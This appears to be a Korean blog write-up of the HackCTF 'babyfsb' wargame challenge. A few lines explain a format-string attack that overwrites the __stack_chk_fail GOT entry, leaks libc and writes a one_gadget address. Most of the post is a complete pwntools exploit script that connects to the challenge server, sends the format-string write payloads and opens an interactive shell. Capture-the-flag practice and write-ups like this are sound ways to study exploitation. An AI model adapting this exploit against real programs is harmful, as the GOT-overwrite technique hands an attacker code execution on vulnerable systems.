babyfsb 본문
Canary가 걸려있다.
먼저 read를 입력을 통해 printf로 출력을 한다.
입력을 한 번밖에 못하므로 __stack_chk_fail의 got주소를 main주소로 덮는다.
그 후 ret주소를 leak 하여 libc base를 계산한다.
one_gadget를 __stack_chk_fail의 got주소에 덮는다.
from pwn import *
#p = process('./babyfsb')
p = remote('ctf.j0n9hyun.xyz', 3032)
e = ELF('./babyfsb')
libc = ELF('./libc.so.6')
canary_got = e.got['__stack_chk_fail']
main = e.symbols['main']
magic_offset = 0x45216
main_low = main & 0xffff
main_high = (main >> 16) %0xffff
payload = '%{}c'.format(main_low)
payload += '%10$hn' # 6 + 32/8
payload += '%{}c'.format(0x10000 + main_high - main_low)
payload += '%11$hn'
payload += 'A' * (8 - len(payload)%8)
payload += p64(canary_got)
payload += p64(canary_got+2)
payload += 'B' * (0x40 - len(payload))
p.send(payload)
payload = '%25$p'
payload += "A"* (0x40 - len(payload))
p.send(payload)
p.recvuntil("0x")
leak_data = p.recvuntil("830")
leak_data = int("0x" + leak_data, 16)
libc_base = leak_data - libc.sym['__libc_start_main'] - 240
magic = magic_offset + libc_base
low = magic & 0xffff
middle = (magic >> 16) & 0xffff
high = (magic >> 32) & 0xffff
l = low
if middle > low:
m = middle - low
elif middle < low:
m = 0x10000 + middle - low
if high > middle:
h = high - middle
elif high < middle:
h = 0x10000 + high - middle
payload = "%{}d".format(l)
payload += "%11$hn"
payload += "%{}d".format(m)
payload += "%12$hn"
payload += "%{}d".format(h)
payload += "%13$hn"
payload += "A"*(8 - len(payload)%8)
print len(payload)
payload += p64(canary_got)
payload += p64(canary_got+2)
payload += p64(canary_got+4)
payload += "A"*(0x40 - len(payload))
p.send(payload)
p.interactive()
'wargame > HackCTF' 카테고리의 다른 글
| Unexploitable #3 (0) | 2021.12.24 |
|---|---|
| ChildHeap (0) | 2021.12.23 |
| j0n9hyun's secret (0) | 2021.12.21 |
| babyheap (0) | 2021.12.21 |
| Unexploitable #2 (0) | 2021.12.17 |
'wargame/HackCTF' 관련글
더보기
Comments